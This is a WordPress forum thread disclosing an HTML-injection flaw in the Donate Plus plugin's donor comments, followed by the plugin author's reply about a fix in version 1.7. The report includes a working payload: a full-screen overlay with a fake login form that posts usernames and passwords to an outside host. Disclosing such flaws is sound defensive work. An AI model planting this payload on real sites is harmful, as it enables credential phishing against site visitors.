WordPress.org

Ready to get started?Download WordPress

Forums

Donate Plus
Potentially Malicious HTML allowed in donor comments (2 posts)

  1. shalzers
    Member
    Posted 3 years ago #

    I was testing this plug-in and found that I was able to embed potentially malicious html in the page that allowed me to take over the screen and overlay whatever content I wanted. Whoops!

    <div style="position: absolute; left: 0px; top: 0px; width: 1900px; height:
    1300px; z-index: 1000; background-color:white; padding: 1em;">Welcome to
    MyGoat!!1! Please Login wit credentialz for major nigerian cash<br><form
    name="login" action="http://aspectsecurity.com"><table><tr><td>Username:
    </td><td><input type="text"
    name="username"/></td></tr><tr><td>Password:</td><td><input type="text"
    name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit"
    value="Login"/></td></tr></table></form><img</div>

    http://img.skitch.com/20101024-8dd26w5225tjfxh9x1s21shemx.png

    I inserted this html through the wordpress backend but assume there is no validation to prevent this.

    http://wordpress.org/extend/plugins/donate-plus/

  2. devbit
    Member
    Plugin Author

    Posted 3 years ago #

    The donation form (and PayPal) only allows 199 characters which your code exceeds, so it would be quite difficult to do too much damage, but I've taken your concerns to heart and have made sure that the paypal submitted comment also has all tags stripped in version 1.7.

    The admin section is meant for the owner of the site, so it will allow any and all code to be entered into a previously submitted donor wall entry - if you want to hack your own site that is up to you! :)

    Thanks for the input!

Topic Closed

This topic has been closed to new replies.

About this Plugin

About this Topic